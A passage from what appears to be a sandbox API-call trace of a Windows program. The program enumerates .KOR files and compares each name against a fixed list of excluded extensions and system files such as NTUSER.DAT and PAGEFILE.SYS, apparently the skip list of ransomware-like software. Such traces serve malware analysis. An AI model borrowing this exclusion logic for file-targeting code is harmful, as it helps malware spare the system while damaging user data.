dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="KOR", cchCount2=3) returned 3 [0058.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="KOR", cchCount2=3) returned 3 [0058.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="KOR", cchCount2=3) returned 3 [0058.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.488] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="KOR", cchCount2=3) returned 3 [0058.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="KOR", cchCount2=3) returned 3 [0058.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="ADOBECOLLABSYNC.KOR", cchCount2=19) returned 3 [0058.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="ADOBECOLLABSYNC.KOR", cchCount2=19) returned 3 [0058.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="ADOBECOLLABSYNC.KOR", cchCount2=19) returned 3 [0058.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="ADOBECOLLABSYNC.KOR", cchCount2=19) returned 3 [0058.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="ADOBECOLLABSYNC.KOR", cchCount2=19) returned 3 [0058.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="ADOBECOLLABSYNC.KOR", cchCount2=19) returned 3 [0058.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="ADOBECOLLABSYNC.KOR", cchCount2=19) returned 3 [0058.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="ADOBECOLLABSYNC.KOR", cchCount2=19) returned 3 [0058.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="ADOBECOLLABSYNC.KOR", cchCount2=19) returned 3 [0058.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="ADOBECOLLABSYNC.KOR", cchCount2=19) returned 3 [0058.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="ADOBECOLLABSYNC.KOR", cchCount2=19) returned 3 [0058.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="ADOBECOLLABSYNC.KOR", cchCount2=19) returned 3 [0058.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="ADOBECOLLABSYNC.KOR", cchCount2=19) returned 3 [0058.489] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="ADOBECOLLABSYNC.KOR", cchCount2=19) returned 3 [0058.489] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82db9460, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x56c00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Annots.KOR", cAlternateFileName="")) returned 1 [0058.489] CharUpperBuffW (in: lpsz=".KOR", cchLength=0x4 | out: lpsz=".KOR") returned 0x4 [0058.490] CharUpperBuffW (in: lpsz="Annots.KOR", cchLength=0xa | out: lpsz="ANNOTS.KOR") returned 0xa [0058.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="KOR", cchCount2=3) returned 1 [0058.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="KOR", cchCount2=3) returned 3 [0058.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="KOR", cchCount2=3) returned 3 [0058.490] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="KOR", cchCount2=3) returned 3 [0058.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="KOR", cchCount2=3) returned 3 [0058.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="KOR", cchCount2=3) returned 3 [0058.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="ANNOTS.KOR", cchCount2=10) returned 3 [0058.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="ANNOTS.KOR", cchCount2=10) returned 3 [0058.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="ANNOTS.KOR", cchCount2=10) returned 3 [0058.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="ANNOTS.KOR", cchCount2=10) returned 3 [0058.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="ANNOTS.KOR", cchCount2=10) returned 3 [0058.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="ANNOTS.KOR", cchCount2=10) returned 3 [0058.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="ANNOTS.KOR", cchCount2=10) returned 3 [0058.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="ANNOTS.KOR", cchCount2=10) returned 3 [0058.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="ANNOTS.KOR", cchCount2=10) returned 3 [0058.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="ANNOTS.KOR", cchCount2=10) returned 3 [0058.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="ANNOTS.KOR", cchCount2=10) returned 3 [0058.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="ANNOTS.KOR", cchCount2=10) returned 3 [0058.491] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="ANNOTS.KOR", cchCount2=10) returned 3 [0058.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="ANNOTS.KOR", cchCount2=10) returned 3 [0058.492] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x99d45400, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x8207ba00, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x99d45400, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x2400, dwReserved0=0x0, dwReserved1=0x0, cFileName="BRdlang32.KOR", cAlternateFileName="BRDLAN~1.KOR")) returned 1 [0058.492] CharUpperBuffW (in: lpsz=".KOR", cchLength=0x4 | out: lpsz=".KOR") returned 0x4 [0058.492] CharUpperBuffW (in: lpsz="BRdlang32.KOR", cchLength=0xd | out: lpsz="BRDLANG32.KOR") returned 0xd [0058.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="KOR", cchCount2=3) returned 1 [0058.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="KOR", cchCount2=3) returned 3 [0058.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="KOR", cchCount2=3) returned 3 [0058.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="KOR", cchCount2=3) returned 3 [0058.492] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="KOR", cchCount2=3) returned 3 [0058.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="KOR", cchCount2=3) returned 3 [0058.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="BRDLANG32.KOR", cchCount2=13) returned 3 [0058.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="BRDLANG32.KOR", cchCount2=13) returned 3 [0058.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="BRDLANG32.KOR", cchCount2=13) returned 3 [0058.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="BRDLANG32.KOR", cchCount2=13) returned 3 [0058.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="BRDLANG32.KOR", cchCount2=13) returned 3 [0058.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="BRDLANG32.KOR", cchCount2=13) returned 3 [0058.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="BRDLANG32.KOR", cchCount2=13) returned 3 [0058.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="BRDLANG32.KOR", cchCount2=13) returned 1 [0058.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="BRDLANG32.KOR", cchCount2=13) returned 1 [0058.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="BRDLANG32.KOR", cchCount2=13) returned 3 [0058.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="BRDLANG32.KOR", cchCount2=13) returned 3 [0058.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="BRDLANG32.KOR", cchCount2=13) returned 3 [0058.493] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="BRDLANG32.KOR", cchCount2=13) returned 3 [0058.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="BRDLANG32.KOR", cchCount2=13) returned 3 [0058.494] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82c16540, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="Checkers.KOR", cAlternateFileName="")) returned 1 [0058.494] CharUpperBuffW (in: lpsz=".KOR", cchLength=0x4 | out: lpsz=".KOR") returned 0x4 [0058.494] CharUpperBuffW (in: lpsz="Checkers.KOR", cchLength=0xc | out: lpsz="CHECKERS.KOR") returned 0xc [0058.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="KOR", cchCount2=3) returned 1 [0058.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="KOR", cchCount2=3) returned 3 [0058.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="KOR", cchCount2=3) returned 3 [0058.494] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="KOR", cchCount2=3) returned 3 [0058.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="KOR", cchCount2=3) returned 3 [0058.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="KOR", cchCount2=3) returned 3 [0058.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="CHECKERS.KOR", cchCount2=12) returned 3 [0058.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="CHECKERS.KOR", cchCount2=12) returned 3 [0058.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="CHECKERS.KOR", cchCount2=12) returned 3 [0058.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="CHECKERS.KOR", cchCount2=12) returned 3 [0058.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="CHECKERS.KOR", cchCount2=12) returned 3 [0058.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="CHECKERS.KOR", cchCount2=12) returned 3 [0058.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="CHECKERS.KOR", cchCount2=12) returned 3 [0058.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="CHECKERS.KOR", cchCount2=12) returned 1 [0058.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="CHECKERS.KOR", cchCount2=12) returned 1 [0058.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="CHECKERS.KOR", cchCount2=12) returned 3 [0058.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="CHECKERS.KOR", cchCount2=12) returned 3 [0058.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="CHECKERS.KOR", cchCount2=12) returned 3 [0058.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="CHECKERS.KOR", cchCount2=12) returned 3 [0058.495] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="CHECKERS.KOR", cchCount2=12) returned 3 [0058.495] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82c16540, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x15400, dwReserved0=0x0, dwReserved1=0x0, cFileName="DigSig.KOR", cAlternateFileName="")) returned 1 [0058.496] CharUpperBuffW (in: lpsz=".KOR", cchLength=0x4 | out: lpsz=".KOR") returned 0x4 [0058.496] CharUpperBuffW (in: lpsz="DigSig.KOR", cchLength=0xa | out: lpsz="DIGSIG.KOR") returned 0xa [0058.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="KOR", cchCount2=3) returned 1 [0058.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RDP", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BLF", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RBS", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REGTRANS-MS", cchCount1=11, lpString2="KOR", cchCount2=3) returned 3 [0058.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SETTINGCONTENT-MS", cchCount1=17, lpString2="KOR", cchCount2=3) returned 3 [0058.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEARCH-MS", cchCount1=9, lpString2="KOR", cchCount2=3) returned 3 [0058.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG1", cchCount1=4, lpString2="KOR", cchCount2=3) returned 3 [0058.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG2", cchCount1=4, lpString2="KOR", cchCount2=3) returned 3 [0058.496] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT", cchCount1=10, lpString2="DIGSIG.KOR", cchCount2=10) returned 3 [0058.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.POL", cchCount1=10, lpString2="DIGSIG.KOR", cchCount2=10) returned 3 [0058.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG", cchCount1=14, lpString2="DIGSIG.KOR", cchCount2=10) returned 3 [0058.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG1", cchCount1=15, lpString2="DIGSIG.KOR", cchCount2=10) returned 3 [0058.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NTUSER.DAT.LOG2", cchCount1=15, lpString2="DIGSIG.KOR", cchCount2=10) returned 3 [0058.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICONCACHE.DB", cchCount1=12, lpString2="DIGSIG.KOR", cchCount2=10) returned 3 [0058.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="THUMBS.DB", cchCount1=9, lpString2="DIGSIG.KOR", cchCount2=10) returned 3 [0058.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTSECT.BAK", cchCount1=12, lpString2="DIGSIG.KOR", cchCount2=10) returned 1 [0058.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BOOTMGR", cchCount1=7, lpString2="DIGSIG.KOR", cchCount2=10) returned 1 [0058.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEFAULT.RDP", cchCount1=11, lpString2="DIGSIG.KOR", cchCount2=10) returned 1 [0058.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PAGEFILE.SYS", cchCount1=12, lpString2="DIGSIG.KOR", cchCount2=10) returned 3 [0058.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HIBERFIL.SYS", cchCount1=12, lpString2="DIGSIG.KOR", cchCount2=10) returned 3 [0058.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SWAPFILE.SYS", cchCount1=12, lpString2="DIGSIG.KOR", cchCount2=10) returned 3 [0058.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WORDPAD.EXE", cchCount1=11, lpString2="DIGSIG.KOR", cchCount2=10) returned 3 [0058.497] FindNextFileW (in: hFindFile=0x69aa00, lpFindFileData=0x18e754 | out: lpFindFileData=0x18e754*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98a32700, ftCreationTime.dwHighDateTime=0x1cb84b4, ftLastAccessTime.dwLowDateTime=0x82c16540, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x98a32700, ftLastWriteTime.dwHighDateTime=0x1cb84b4, nFileSizeHigh=0x0, nFileSizeLow=0x3600, dwReserved0=0x0, dwReserved1=0x0, cFileName="DVA.KOR", cAlternateFileName="")) returned 1 [0058.497] CharUpperBuffW (in: lpsz=".KOR", cchLength=0x4 | out: lpsz=".KOR") returned 0x4 [0058.497] CharUpperBuffW (in: lpsz="DVA.KOR", cchLength=0x7 | out: lpsz="DVA.KOR") returned 0x7 [0058.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BG85", cchCount1=4, lpString2="KOR", cchCount2=3) returned 1 [0058.497] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="KOR", cchCount2=3) returned 3 [0058.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BMP", cchCount1=3, lpString2="KOR", cchCount2=3) returned 1 [0058.498] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="KOR", 